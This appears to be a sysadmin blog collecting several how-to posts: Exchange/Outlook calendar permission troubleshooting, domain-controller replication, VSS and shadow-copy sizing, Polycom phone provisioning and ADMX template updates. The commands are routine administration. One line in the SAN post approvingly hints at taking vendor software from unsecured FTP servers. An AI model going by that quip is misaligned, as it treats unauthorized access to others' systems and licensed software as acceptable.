## Outlook 2016 Calendar Sharing - "You Don't Have Permission To Create An Entry In This Folder"

### SCENARIO

You try to share a calendar in Outlook 2016. When the person who has EDITOR access rights adds the shared calendar to their Outlook, they get the following message:
"You Don't Have Permission To Create An Entry In This Folder...."

### RESOLUTION

There can be many reasons why this is happening. Ultimately it is a permission issue or a cache permission issue.

#### 1-check to see if the calendar has the correct permissions.

Show Calendar Permissions
Get-MailboxFolderPermission foo.user:\calendar

Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 -AccessRights Editor

The non-working mailbox calendar has the correct permissions and it still doesn't work.
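
To confirm that the delegate's entry really carries the right to create items, the check can be scripted. This is an added example, not from the original post; the function name `Test-CalendarCreateRight` is hypothetical, and `foo.user` / `foo.user2` are the page's placeholder identities. It only looks at the delegate's direct entry on the folder, not at rights granted through a group.

```powershell
# Added example: does the delegate's calendar-folder entry allow creating items?
# Run in the Exchange Management Shell.
function Test-CalendarCreateRight {
    param(
        [Parameter(Mandatory)][string]$Mailbox,  # calendar owner, e.g. foo.user
        [Parameter(Mandatory)][string]$User      # delegate, e.g. foo.user2
    )

    # Folder roles (and the individual right) that include CreateItems.
    # Reviewer and the free/busy-only roles do not.
    $canCreate = 'Owner', 'PublishingEditor', 'Editor', 'PublishingAuthor',
                 'Author', 'NonEditingAuthor', 'Contributor', 'CreateItems'

    # Resolve the calendar by folder type: its display name is localized on
    # some mailboxes, so "foo.user:\calendar" is not always the right path.
    $folder = Get-MailboxFolderStatistics -Identity $Mailbox -FolderScope Calendar |
        Where-Object { $_.FolderType -eq 'Calendar' } |
        Select-Object -First 1
    if (-not $folder) { throw "No calendar folder found for $Mailbox" }
    $folderId = '{0}:\{1}' -f $Mailbox, $folder.Name

    # A missing entry is a valid result (no direct grant), so do not stop on it.
    $entry = Get-MailboxFolderPermission -Identity $folderId -User $User -ErrorAction SilentlyContinue
    $rights = @()
    if ($entry) { $rights = @($entry.AccessRights | ForEach-Object { "$_" }) }

    [pscustomobject]@{
        Folder    = $folderId
        User      = $User
        Rights    = $rights -join ', '
        CanCreate = [bool]($rights | Where-Object { $canCreate -contains $_ })
    }
}

Test-CalendarCreateRight -Mailbox 'foo.user' -User 'foo.user2'
```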

#### 2-temporarily change the primary smtp address on the shared account.

Don't ask me why but I've witnessed that if the shared account changes the primary smtp email address domain sometimes the person trying to access the calendar can suddenly edit the calendar if they remove the calendar and add it back in. Here's how...

On OUTLOOK where you are trying to access the shared calendar:
-click CALENDAR (bottom-left).
-find OTHER CALENDARS.
-right-click on the calendar-name.
-click DELETE CALENDAR (don't worry, this only removes the calendar. It doesn't actually delete the calendar).
-close OUTLOOK.

-change primary smtp via ECP (web interface) from original domain to: alternate domain

-open OUTLOOK.

-click CALENDAR (bottom-left).
-find OTHER CALENDARS.
-right-click OTHER CALENDARS > ADD CALENDAR > OPEN SHARED CALENDAR.
-type in the name of the person.
-click OK.

WORKS WITH NEW DOMAIN!!! And can edit the calendar.

-remove the shared calendar (same as above).

-change primary smtp via ECP (web interface) from alternate domain to: original domain

WORKS WITH ORIGINAL DOMAIN!!! And can edit the calendar.

It is important to note that changing via Exchange Management Shell (EMS) did not work and resulted in the original error.

Set-Mailbox foo.user -PrimarySmtpAddress [e-mail address hidden by the site's spam protection]
Add-MailboxFolderPermission foo.user:\calendar -User foo.user2

I'm not sure if this is an emailaddresses issue. Or a missing value in one of the keys that is changed in the ECP and not in the EMS. Or if it is a global-address cache issue. Or if it is a GAL sync issue that takes time. All I can tell you is that I performed the steps above and it worked. Took me a good 30 hours or so to figure that out.

In any event, I checked the following but nothing produced any meaningful results concerning this issue:
Get-MailboxPermission foo.user | fl
Get-Mailbox foo.user | Select-Object -ExpandProperty EmailAddresses
Get-CalendarProcessing foo.user | fl
Get-CASMailbox foo.user | fl

#### 3-check the offlineaddressbook setting for the mailboxdatabase

Somewhere along the line during initial install, a CU update or creation of a new mailboxdatabase, the OFFLINEADDRESS book key is blank/null. I think it would automatically default to the default address book but I really don't know. I haven't found any info that says having a null value is bad but most info I see says to set it for all mailboxdatabases.

Find the name of the OFFLINE ADDRESS BOOK:

Now set the MAILBOXDATABASE to use that name:
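
One way to carry out both steps from the Exchange Management Shell, as an added example that is not from the original post. It assumes the offline address book flagged as default is the one to assign; the `-WhatIf` switch previews the change and has to be removed to apply it.

```powershell
# Added example: find mailbox databases with a blank OfflineAddressBook value
# and point them at the default offline address book.

# Step 1: list the offline address books and see which one is the default.
$oabs = @(Get-OfflineAddressBook)
$oabs | Format-Table Name, IsDefault, AddressLists -AutoSize

# Step 2: list the mailbox databases whose OfflineAddressBook is blank/null.
$unset = @(Get-MailboxDatabase | Where-Object { -not $_.OfflineAddressBook })
$unset | Format-Table Name, Server, OfflineAddressBook -AutoSize

# Step 3: choose the OAB to assign (assumption: the default one is wanted).
$target = $oabs | Where-Object { $_.IsDefault } | Select-Object -First 1
if (-not $target) {
    throw 'No default offline address book found; pick one by name instead.'
}

# Step 4: assign it to every database found in step 2.
foreach ($db in $unset) {
    Set-MailboxDatabase -Identity $db.Name -OfflineAddressBook $target.Identity -WhatIf
}

# Step 5: verify the value on all databases.
Get-MailboxDatabase | Format-Table Name, OfflineAddressBook -AutoSize
```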

### NOTES

Calendar Permissions can be set individually or by role. The DEFAULT permissions are:
ReadItems, CreateItems, EditOwnedItems, EditAllItems, CreateSubfolders, FolderVisible

Or another way to view the DEFAULT role is like this (the minus is what the role doesn't have):
CreateItems
EditOwnedItems
EditAllItems
CreateSubfolders
FolderVisible
-DeleteOwnedItems
-DeleteAllItems
-FolderOwner
-FolderContact

The EDITOR role permissions are:
ReadItems, CreateItems, EditOwnedItems, EditAllItems, FolderVisible, DeleteOwnedItems, DeleteAllItems

Or another way to view the EDITOR role is like this (the minus is what the role doesn't have):
CreateItems
EditOwnedItems
EditAllItems
-CreateSubfolders
FolderVisible
DeleteOwnedItems
DeleteAllItems
-FolderOwner
-FolderContact

#### GET PERMISSION TO MAILBOX

Sometimes getting the permissions to the mailbox helps:
Get-MailboxPermission foo.user

#### GET PERMISSION TO MAILBOX THAT IS ANOTHER USER

Sometimes it helps to see who else has permission to the mailbox:
Get-MailboxPermission foo.user |? {$_.IsInherited -ne "true" -and $_.User -ne "NT AUTHORITY\SELF"}

Another way is:
Get-MailboxPermission foo.user | where { ($_.IsInherited -eq $false) -and -not ($_.User -like "NT AUTHORITY\SELF") } | select User,AccessRights,Deny,InheritanceType

Which is the same as:
Get-MailboxPermission foo.user |? {$_.IsInherited -eq $false -and $_.User -ne "NT AUTHORITY\SELF"} | select User,AccessRights,Deny,InheritanceType

#### CHANGE PERMISSION TO MAILBOX

Sometimes you need to change permissions on the mailbox:
Set-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess

Add-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess

#### REMOVE PERMISSION TO MAILBOX

remove-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess

#### SEE COMPLETE FOLDER STRUCTURE

Sometimes, seeing the complete folder structure of the mailbox helps:
get-MailboxFolder foo.user:\ -recurse

#### GET THE CALENDAR NAME

Sometimes getting the calendar name helps because it is changed from another language:
Get-MailboxFolderStatistics foo.user | Where-Object { $_.FolderType -eq "Calendar" } | Select-Object Name

#### ADD CALENDAR FOLDER PERMISSIONS

Sometimes you need to add permissions to the calendar:
Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 -AccessRights Editor

#### REMOVE CALENDAR FOLDER PERMISSIONS

Sometimes you need to remove permissions to the calendar:
Remove-MailboxFolderPermission -Identity foo.user:\calendar -User foo.user2

#### SEE MAILBOXES IN ORGANIZATIONAL UNIT

Sometimes you need to see the email in a single AD OU:
Get-Mailbox -OrganizationalUnit "ou=where-ever,ou=whatever-users,dc=domain,dc=tld" -ResultSize Unlimited | Get-MailboxStatistics | ft DisplayName,TotalItemSize,ItemCount

#### REMOVE CACHE SHARED CALENDAR FOLDERS IN OUTLOOK 2016:

Sometimes working off of cached shared calendar folders causes an issue and you need to remove the cache folders from OUTLOOK 2016:
-account-settings > email > change > more-settings > advanced
-uncheck "Download Shared Folders"
-restart OUTLOOK

#### REMOVE CACHE FOLDERS IN OUTLOOK 2016:

Sometimes working off of cached folders causes an issue and you need to remove all the cache folders from OUTLOOK 2016:
-account-settings > email > change
-uncheck "Use Cached Exchange Mode"
-click NEXT > FINISHED
-restart OUTLOOK

## Windows Server 2012 Connect Branch Office to HQ Domain And Replicate Domain And Replicate DNS

I had a new 10K server and wanted to test it out before making changes. The goal is to turn it into a VM, then test connecting to the HQ domain and replicating the domain and DNS.

In this situation the branch office already had a domain. The location was purchased by HQ and needed to roll into the HQ domain.

Couple of notes before we begin:
-keep your domain flat. If you can, do NOT do subdomains, trusts, etc. It's too much of a pain later on. Keep it simple.
-you can have 2 domains on the same network (just not 2 DHCP servers).

### CREATE VIRTUAL MACHINE

HYPER-V is included in WINDOWS-10. So all we have to do is create a new VHDX from the existing SSD that came with the server.

-connect SSD to WINDOWS-10 via USB caddy.
-download DISK2VHD.
-created server-2012r2 vm with DISK2VHD (you only need the main partition).
-started HYPER-V
-created new VM (do not import, etc).
-attached newly created VHDX, no-network, 4 processors, 10GB ram.
-booted for first time.
-installed dns, ad, file.
-shutdown.
-create VSWITCH external-network & allow-management-operating-system-to-share-this-network-adapter (no vlan id).
-attached VSWITCH to VM.

### ADD BRANCH OFFICE TO DOMAIN

-on hq ad server: ad-sites-services > create-new-site-for-branch-office
-on hq ad server: ad-sites-services > subnets > create subnets-for-branch-office & attach to branch-office
-on hq ad server: ad-sites-services > inter-site-transports > ip > create new > hq/branch > 15 mins

### JOIN BRANCH OFFICE SERVER TO HQ DOMAIN

Simple enough but if you've never done it before you might be thinking there's something more to it. There isn't.

-start VM
-change ip address to static-ip
-change dns to dns at hq
-join domain
-restart

### PROMOTE BRANCH OFFICE SERVER AS DOMAIN CONTROLLER

-click MANAGE > ADD-ROLES-AND-FEATURES
-click NEXT > NEXT > NEXT
-click ACTIVE-DIRECTORY-DOMAIN-SERVICES
-let it go through its setup.
-click promote to DOMAIN-CONTROLLER (upper-right flag)
-select ADD-A-DOMAIN-CONTROLLER-TO-AN-EXISTING-DOMAIN
-select DNS SERVER & GC (global catalog)
-create DSRM password.
-accept defaults until INSTALL.
-click INSTALL
-wait
-server reboots

### REPLICATE BRANCH OFFICE SERVER DOMAIN CONTROLLER

-check USERS&COMPUTERS to see if in DOMAIN-CONTROLLERS
-check SITES&SERVICES
-view all servers are correct.
-click NTDS SETTINGS
-right-click right-panel
-click REPLICATE-NOW
-cycle through all NTDS SETTINGS
-right-click NTDS-SETTINGS > ALL-TASKS > CHECK-REPLICATION-TOPOLOGY
-cycle through all NTDS SETTINGS
-ps-type: repadmin /replsummary (on the new server, the largest delta is 'unknown')
-click NTDS SETTINGS
-right-click right-panel
-click REPLICATE-NOW
-ps-type: repadmin /replsummary (on the new server, notice the time is now a few seconds)

High-five!!!

NOTES:
thai-mswindows (youtube)

## CTS2600

I have a storage array with 12 3.5" drives. It's a little older but it works. It has an LSI sticker on it. I pop in some hard drives, plug in the Ethernet connection and power it on.

Now, how do I control it? There is no monitor connection. So, I look at the DHCP and find the ip address. I put the ip address in the browser but nothing shows. With a tool, I see that it is showing as a NETAPP device. Hmmm... I thought it was LSI but OK. I do a little googling and find that NETAPP purchased the storage array division from LSI.

So I go to the NETAPP (who acquired LSI) web site for support. I see that it needs a program called SANTRICITY. SANTRICITY isn't offered as a free download, I have to register for it. No problem. I register for the support site and try to download it. No go. I'm "unauthorized" for that download. No problem. I provide the SERIAL-NUMBER on the device and wait.

I receive a message from NETAPP stating that they won't provide support since they made it for someone else who branded it as their own. Also known as an OEM. It even states in their LSI acquire document:
http://mysupport.netapp.com/NOW/public/apbu/oemcp/NetApp_Engenio_Support_Integration_FAQ.pdf

But who is the OEM? I don't know. There are no markings on the device. This OEM is supposed to provide SANTRICITY or a rebrand of the app to control the storage device.

I find out that the device is actually an LSI CTS2600. The LSI CTS2600 was made for DELL as the POWERVAULT MD3200.
I download the DELL software but it doesn't find the array that is booted. I try a couple more times without success.

I finally hear back from NETAPP that the OEM is BLUEARC. Great! A little more googling and I see that it is a BlueArc Mercury 50. BLUEARC was purchased by HITACHI. Humph...

Signing up for access to the Hitachi support web site. The BLUEARC software was incorporated into HITACHI COMMAND SUITE. https://support.hds.com/en_us/user/downloads/ is empty. So I emailed support. Support writes back that there is no support contract on the device so they will not provide any help.

Now I have a 20K SAN that boots and physically works but I have no way to control it or manage it. In other words, I have a 20K boat anchor.

Good thing there are FTP sites with admins that don't lock them up :-)

## System Volume Information Folder Size

If you are "missing" free space, and only have a few GB left when you should have many GB left (or TB), the culprit could likely be:

• -permission issue. You cannot see the size of a folder if you do not have read permissions to access the folder.
• -SHADOW COPIES.

You can see if there are SHADOWS by following the instructions in the previous post. One item that VSSADMIN and DISKSHADOW will not show is the size of the SHADOW. Bummer.

The Windows OS saves these SHADOWS in the SYSTEM VOLUME INFORMATION folder. For various reasons, a typical administrator does not have permissions to that folder. This causes an issue because you cannot know the size of the folder through EXPLORER.

So how do you know the size of the SYSTEM VOLUME INFORMATION folder? Here's how using robocopy:

• robocopy "c:\System Volume Information" c:\dummy /l /xj /e /nfl /ndl /njh /r:0 /b

For most other items, WINDIRSTAT will show you the way.

## DISKSHADOW And VSSADMIN

DISKSHADOW And VSSADMIN control shadows. But what's a "shadow"? Good question. A shadow is a copy of a file or a volume. This can be done even while the file is in use.
The proper name for this is Volume Snapshot Service or Volume Shadow Copy Service or VSS. And it works at a block level (rather than a file level).

There are a couple of parts to this but the heart of the technology is the VOLUME SHADOW COPY SERVICE which performs the actual copy. The transfer of the data is called a PROVIDER. While Windows comes with its own PROVIDER, other software companies can create their own providers.

An example of a built-in PROVIDER is SYSTEM RESTORE or PREVIOUS VERSIONS for a file or folder. An example of an outside software company is SHADOWPROTECT. While SHADOWPROTECT is an outside company, it still relies on VSS to create the shadow on its behalf. SHADOWPROTECT does not create its own shadow.

The shadows are traditionally managed by VSSADMIN. Here's how to show all PROVIDERS in either powershell or command-line:

• vssadmin list providers

And here's how to show the SHADOWS:

• vssadmin list shadows

And here's how to show the SHADOW storage:

• vssadmin list shadowstorage

VSSADMIN is not the only tool. Another tool gives more info. That is DISKSHADOW. DISKSHADOW is an interactive command interpreter like DISKPART. What I've found is that DISKSHADOW is a more accurate and more powerful tool.

Here's how to enter DISKSHADOW interactive:

• DISKSHADOW

Here's how to show all PROVIDERS:

• DISKSHADOW> list providers

Here's how to show all SHADOWS:

• DISKSHADOW> list shadows all

It will show all the SHADOWS, whether they were created for a built-in provider or for a 3rd party provider. And it will show the provider ID for each shadow.

To add info, you should be able to limit the size of a shadow:

• -computer-management
• -right-click SHARED-FOLDER (on the left-hand side)
• -click ALL-TASKS > CONFIGURE-SHADOW-COPIES
• -click SETTINGS for each drive and adjust the size as you see fit.

NOTE: you can also do this on the DISK-MANAGEMENT snap-in.

## Upgrading Polycom Phones Across Entire Location

[NOTE: please read entire document before proceeding.]
Upgrading all the Polycom phones across an entire location has been a mission. Again, there's so much misinformation and so many different setups that it is hard to weed through it all.

In short, you first need to provision the phones. Secondly, you need to update the firmware and software.

In older Polycom phones, called SoundPoint phones, you need 2 files uploaded to your phone-server for each model of phone-set. The 2 files are:

• the bootrom/bootloader/updater file.
• the sip/uc-software/application (sip.ld) file.

In newer Polycom phones, called VVX phones, the bootrom/bootloader/updater file is automatically included in the sip/uc-software/application (sip.ld) file.

### STAGE 1: Provision Polycom Phones

Polycom phones can boot with power or POE (hint, use POE). Without a configuration, they won't do anything except complain. Configurations are great because they determine nearly everything on the phone. You can set phone call features, backgrounds and even speakerphone volume. In fact, you can set just about everything.

The configuration can be kept in one of the following locations:

• phone: settings set by the buttons on the phone.
• web: settings set by the web interface.
• server: central server that provides the configuration.

We are interested in large deployments, so we will focus on central server deployments. This is important because the configuration of the setup is usually more than just the phone server and attention is needed elsewhere. If your phones are getting configurations and you don't see them in the phone set or on the phone server, then the DHCP server is where to look.

Central server deployments can serve the configuration files through:

• FTP
• TFTP
• HTTP/HTTPS

Most deployments will use FTP since it can be set up everywhere; meaning inside the office and outside the office. On the other hand, TFTP will only be available inside the office.

Upon booting, phones will naturally try to get an IP address from a DHCP server.
When they talk to the DHCP server, the server can respond with some options to tell the Polycom phones where to look for the configuration files. The options are:

• OPTION-066: this is a typical TFTP server option. However, it may already be in use by something else so Polycom had to put in a higher priority option customized just for Polycom phones.
• OPTION-160: this is a Polycom specific TFTP server option. Polycom phones are hard-coded to look for this option first. This will have to be added as an option on a MS DHCP server.

To add the option to MS DHCP:

• -start the DHCP server-manager
• -right-click IPV4 or IPV6 (on the left-hand side).
• -click SET-PREDEFINED-OPTIONS
• -click ADD
• -type:
  NAME: Polycom Boot Server Name
  DATA: String
  CODE: 160
  DESCRIPTION: doesn't-matter

To add the OPTION-160 to the DHCP scope:

This is the secret sauce and test it out before roll-out on large deployments by rebooting just one phone. This will set the value on the phone. If the value is set incorrectly and is unable to find the central-server, the phone will not be able to obtain the configuration files and will use the cached configuration. The only way I know to clear the cache is to login to the web interface:

• -click UTILITIES > SOFTWARE-UPGRADE
• -click CLEAR-UPGRADE-SERVER

If that doesn't work, factory default the phone. This can be harder than it sounds.
• -hold 1-3-5; type in 456 or type in the macaddress from the bottom of the phone (001122334455)
• -press HOME > SETTINGS > ADVANCED > ADMINISTRATOR-SETTINGS > RESET-TO-DEFAULTS > RESET-LOCAL-CONFIG (wipes macaddress-phone.cfg from server)
• -press HOME > SETTINGS > ADVANCED > ADMINISTRATOR-SETTINGS > RESET-TO-DEFAULTS > RESET-WEB-CONFIG (wipes macaddress-web.cfg from server)
• -press HOME > SETTINGS > ADVANCED > ADMINISTRATOR-SETTINGS > RESET-TO-DEFAULTS > RESET-TO-FACTORY (wipes all configuration containers on the device)
• -press HOME > SETTINGS > ADVANCED > ADMINISTRATOR-SETTINGS > RESET-TO-DEFAULTS > FORMAT-FILE-SYSTEM (wipes app from phone and will require provisioning server to work again)

You can see if the provisioning worked by looking at the phone:

• -press HOME > SETTINGS > STATUS > PLATFORM > CONFIGURATION
• -see the boot server, boot type and configuration files.

### STAGE 2: THE BOOTROM/UPLOADER

1-First, download the BOOTLOADER/BOOTROM/UPDATER files here for the SOUNDPOINT phones (the VVX phones have their BOOTROM/UPDATER included in the sip.ld file):
http://downloads.polycom.com/voice/voip/uc/SoundPoint_IP_BootROM_4_4_0_Upgrader_release_sig.zip
(or if you have a SoundStation 6000/7000, you need the B version here:
http://downloads.polycom.com/voice/voip/uc/SoundPoint_IP_BootROM_4_4_0B_Upgrader_release_sig.zip)

2-unzip the download and inside the folder you will see the bootloader files like:
2345-12560-001.bootrom.ld

3-Take all the BOOTROM files and upload them to your phone-server (provisioning server) in the tftpboot directory. (fyi - the tftpboot directory will be at the root of the filesystem: /tftpboot.)

The chart below will show what bootrom goes with what phone-set model.

| FILES | DESCRIPTION |
| --- | --- |
| bootrom.ld | Concatenated BootROM |
| 2345-12345-001.bootrom.ld | ????? (Probably SoundPoint IP 300/302/320/330) |
| 2345-12360-001.bootrom.ld | SoundPoint IP 321 |
| 2345-12365-001.bootrom.ld | SoundPoint IP 331 |
| 2345-12375-001.bootrom.ld | SoundPoint IP 335 |
| 2345-12450-001.bootrom.ld | SoundPoint IP 450 |
| 2345-12500-001.bootrom.ld | SoundPoint IP 550 |
| 2345-12560-001.bootrom.ld | SoundPoint IP 560 |
| 2345-12600-001.bootrom.ld | SoundPoint IP 650 |
| 2345-12670-001.bootrom.ld | SoundPoint IP 670 |
| 2345-17960-001.sip.ld | VVX 1500 |
| 3111-15600-001.bootrom.ld | SoundStation IP 6000 |
| 3111-17823-001.dect.ld | VVX D60 Wireless Handset & Base Station |
| 3111-19000-001.sip.ld | SoundStation Duo |
| 3111-30900-001.bootrom.ld | SoundStation IP 5000 |
| 3111-33215-001.sip.ld | SoundStructure |
| 3111-36150-001.sip.ld | SpectraLink 8440 |
| 3111-36152-001.sip.ld | SpectraLink 8450 |
| 3111-36154-001.sip.ld | SpectraLink 8452 |
| 3111-40000-001.bootrom.ld | SoundStation IP 7000 |
| 3111-40250-001.sip.ld | VVX 101 |
| 3111-40450-001.sip.ld | VVX 201 |
| 3111-44500-001.sip.ld | VVX 500 |
| 3111-44600-001.sip.ld | VVX 600 |
| 3111-46135-002.sip.ld | VVX 300 |
| 3111-46161-001.sip.ld | VVX 310 |
| 3111-46157-002.sip.ld | VVX 400 |
| 3111-46162-001.sip.ld | VVX 410 |
| 3111-48300-001.sip.ld | VVX 301 |
| 3111-48350-001.sip.ld | VVX 311 |
| 3111-48400-001.sip.ld | VVX 401 |
| 3111-48450-001.sip.ld | VVX 411 |
| 3111-48500-001.sip.ld | VVX 501 |
| 3111-48600-001.sip.ld | VVX 601 |
| 3111-48810-001.sip.ld | VVX 150 |
| 3111-48820-001.sip.ld | VVX 250 |
| 3111-48830-001.sip.ld | VVX 350 |
| 3111-48840-001.sip.ld | VVX 450 |

Great! You are halfway there.

### STAGE 3: THE SIP.LD FILE (aka POLYCOM-UC-SOFTWARE aka APPLICATION)

The SIP.LD file is the image that will be served by the TFTP/FTP central server. This is the same as the APPLICATION VERSION or the SIP APPLICATION VERSION.
1-First, look at the Polycom Matrix for older phones (ie SOUNDPOINT/SOUNDSTATION phones) here:
http://downloads.polycom.com/voice/voip/sip_sw_releases_matrix.html
Or the Polycom Matrix for newer phones (ie VVX phones) here:
http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html

2-Second, download the most recent version of the firmware (get the SPLIT-DOWNLOAD [not combined-download]). There are many options here but they should be boiled down to either "Current GA for Microsoft Lync" or "Current GA Release". (Hopefully it's obvious, the MS Lync is for MS Lync servers. If you do not know what that is, don't worry about it as it is not the one you need.) (As of this writing the Current General Availability for SOUNDPOINT phone-sets is v4.0.11.)

3-unzip the download and inside the folder, you will see SIP.LD files like:
2345-12560-001.sip.ld

4-Take all the LD files and upload them to your phone-server (provisioning server) in the tftpboot directory. Overwrite any files that are currently there (even if they are from the bootrom zip from above). [This process is easier than figuring out if we need the files or not. Having everything will not hurt anything.]

5-Once there, rename the file according to your system. Use the guide above as direction. I had to rename the files as such:
sip.SPIP560.4.0.11.revc.ld
sip.VVX410.5.7.0.revc.ld

### STAGE 4: CONFIG FILES

From here, there might be some troubleshooting. Namely, some of the old config files may not work with the most recent firmware. Edit the files accordingly in the tftpboot directory.

Each phone will have a MAC-address number on the back. Something like, 0004123EDT78. So, each phone will have a base-config file of mac-number.cfg. Something like, 0004123EDT78.cfg

The phones are hard coded to look for this file. The first part of the file will dictate that SIP.LD/APPLICATION file.
It will look like this:
APPLICATION APP_FILE_PATH="sip.[PHONE_MODEL].3.2.3.revc.ld"

With our directory structure in place, we can have the same model of phones use different APPLICATION versions at the same time. And we can have different models of phones use different APPLICATION versions at the same time.

All of this is done by changing the base-config file. This file will determine what SIP.LD file to use and what further config files to use. Before the update, the contents will look something like this:

<APPLICATION
  APP_FILE_PATH="sip.[PHONE_MODEL].3.2.3.revc.ld"
  CONFIG_FILES="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.3.2.3.revc.cfg"
  MISC_FILES="0004123EDT78-directory.xml"
  LOG_FILE_DIRECTORY=""
  OVERRIDES_DIRECTORY=""
  CONTACTS_DIRECTORY=""
  LICENSE_DIRECTORY="">
</APPLICATION>

After the update, you need to edit the file to look something like this:

<APPLICATION
  APP_FILE_PATH="sip.[PHONE_MODEL].4.0.11.revc.ld"
  CONFIG_FILES="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.4.0.11.revc.cfg"
  MISC_FILES="0004123EDT78-directory.xml"
  LOG_FILE_DIRECTORY=""
  OVERRIDES_DIRECTORY=""
  CONTACTS_DIRECTORY=""
  LICENSE_DIRECTORY="">
</APPLICATION>

You can do this file-by-file if needed. Or you can run one command on the phone-server.

1-make sure you are in the tftpboot directory
2-make a directory for the backup of the files:
mkdir cfgfiles
3-copy all the base config files into this directory:
cp ./000*.cfg ./cfgfiles
(or cp ./6416*.cfg ./cfgfiles)
4-change all the files at once (the dots in the search pattern are escaped so they match only literal dots):
sed -i -e "s/3\.2\.3\.revc\.ld/4.0.11.revc.ld/g" ./000*.cfg

This will update all the base-config files to tell the phone-sets to use the new SIP.LD/APPLICATION files.

#### PHONE OVERRIDE FILES

Phone override files are changes made from the phone-set and are named <MAC Address>-phone.cfg. So something like, 0004123EDT78-phone.cfg

On my phone-server, the older phone override files were named phone-0004123EDT78.cfg

If they have parameters older than v3.3.0, you will get an error message.
To fix, see below in the "UPDATE CONFIG FILE WITH UTILITY" section.

#### WEB OVERRIDE FILES

If you change something via the phone-set web interface, it will save the settings in a web-override file named <MAC Address>-web.cfg. So something like, 0004123EDT78-web.cfg

### STAGE 5: REBOOT

Now reboot the phone. It should upgrade the bootrom automatically. You do not need to do anything as the phone is hard coded to look for and use the newest bootrom available. After the bootrom is updated, the application/sip.ld will update. This process may take around 10 minutes per phone.

If you have a POE switch, you can do this across the network by unplugging the POE switch. Wait about 1 minute. Plug the POE switch back in. Then wait about 15 minutes for all the phones to upgrade. (Of course, wait for an after-hours time period.)

### STAGE 6: UPDATE CONFIG FILE WITH UTILITY

If you have an older config file, the Polycom phone-set will give an error. Something like, "phone-0004123EDT78.cfg is pre-3.3.0 params." Basically it is saying that you are trying to config a parameter that doesn't exist. You can see what config files are being used and which have errors by:

• -press HOME > SETTINGS > STATUS > PLATFORM > CONFIGURATION
  scroll down on the phone and it will show the number of PRE-3.3.0, ERRORS, DUPLICATES and OK's.

Consequently, you will have to update your config files to remove those parameters. This can be done parameter-by-parameter by looking at the log file on the phone (or server) and manually adjusting for each. Or you can do this automatically with a Windows software utility called CFCUtility. Your results may vary so be careful with the utility.

• -download it here: http://support.polycom.com/PolycomService/support/us/support/eula/ucs/UCConfig_agreement.html
• -unzip.
• -in the CFCUtility folder, create a folder called "config-files".
• -on the central-server, make sure you are in the tftpboot directory.
• -make a backup directory: mkdir cfgphonefiles
• -copy all the phone files to this directory (as a backup for safe keeping): cp ./*cfg ./cfgphonefiles/
• -gather all the config-files in the folder called "config-files". (this can be done by mounting usb drive, ftp, scp, etc)
• -from a Windows command-line change to the CFCUtility folder.
• -type: cfcUtility.exe -t ./config-files
• -it will ask you some generic questions; accept the defaults.

Now you can transfer the files back to the phone-server in the tftpboot directory.

• -reboot the phone(s). (remember, if you have a POE switch unplug the switch and plug back in for a network-wide solution)
• -it will reboot 2 or 3 times on its own.

### UNCOMPLICATING CONFIG FILES

All the configuration for the phones can be done in one config file if we really wanted to. Or we could have one really long config file for each phone. But for sanity's sake, we break this out. In the tftpboot directory, you will have some files for each phone-set:

0004123EDT78.cfg (the base config. The backup is in the cfgfiles directory)
0004123EDT78-phone.cfg (the new phone override, used automatically)
0004123EDT78-web.cfg (the new web override, used automatically)
phone-0004123EDT78.cfg (the old phone override, used by the base-config file. This file is converted and a backup is in the cfgphonefiles directory. It can be deleted since it is not being used.)

Other config files can be present as well (but not required). In the unzip folder of the Polycom UC Software from STAGE-3, you can find the generic config files:

applications.cfg
dect.cfg
device.cfg
features.cfg
firewall-nat.cfg
H323.cfg
lync.cfg
pstn.cfg
reg-advanced.cfg
reg-basic.cfg
region.cfg
sip-basic.cfg
sip-interop.cfg
site.cfg
tr069.cfg
video.cfg
video-integration.cfg

Each has its own place in life.
I usually see:

64167f920093-reg-basic.cfg (for the line registration)
64167f920093-features.cfg (for the features of the phone)
polycom.UC5.7.0.sip-basic-11325.cfg (for the line registration of the location)
polycom.UC5.7.0.device-11325.cfg (for device settings for the location)
polycom.UC5.7.0.sip-interop-11325.cfg (for interoffice operation settings)
polycom.UC5.7.0.site-11325.cfg (for site settings like timezone)

You can see the entire list of options/values by inspecting the 73,000 line file in the unzip download:
Polycom-UC-Software-5-7-0-rts18-release-sig-split\Config\polycomConfig.xsd

#### FOR NEWER FIRMWARE VERSIONS, SINGLE PHONE

For newer phone-sets with updated firmware versions, simply redirect the provisioning server to:
voipt2.polycom.com/<version-number>

1. go to phone
2. press Menu > Settings > Advanced (default password: 456) > Administration Settings > Network Configuration > Provisioning-Server
3. change Server Type to HTTP.
4. type: voipt2.polycom.com (for Server Address)
   • Example: to load the latest SIP 4.04 = voipt2.polycom.com/404
   • Example: to load the latest SIP 4.0.11 = voipt2.polycom.com/4011
5. reboot the phone-set
6. wait 15 minutes
7. once updated, change the server back to the local provisioning-server

For a current live directory list go here:
http://voipt2.polycom.com/WEBCONTENT/directory.html

NOTES:
-the config files are explained here: http://documents.polycom.com/topics/139356

## Update the ADMX Templates in Windows Server to Apply GPO to Windows 10

Updating the ADMX Templates in Windows Server to Apply GPO to Windows 10 is a manual process.

A Windows Server can control Windows client computers through Group Policy/Group Policy Objects (GP/GPO). It does this through template files called ADMX files. These ADMX files simply correspond to registry-edits (regedits).
Since not all regedits are available on all OS versions (for example, controlling OneDrive was included along the way), there is a set of ADMX files for common milestones like:

• -Windows 7
• -Windows 7 SP1
• -Windows 8
• -Windows 8.1
• -Windows 10
• -Windows 10 (1511)
• -Windows 10 (1607) Anniversary Update

The ADMX files are not automatically updated on the Windows Server. They must be manually updated. The updates are in MSI files (and not zipped files). The instructions are pretty simple once someone shows you:

• -download the ADMX msi.
• -install the ADMX msi (this will unpack the ADMX files in a folder called "Policy Definitions").
• -copy the entire contents to: C:\Windows\SYSVOL\sysvol\domain-name\Policies\PolicyDefinitions\

You can find the ADMX files here:

-Windows 10 (1511)
https://www.microsoft.com/en-us/download/details.aspx?id=48257
-Windows 10 (1607) Anniversary Update
https://www.microsoft.com/en-us/download/details.aspx?id=53430
-Windows 10 (1703)
https://www.microsoft.com/en-us/download/details.aspx?id=55080
-Windows 10 (1709)
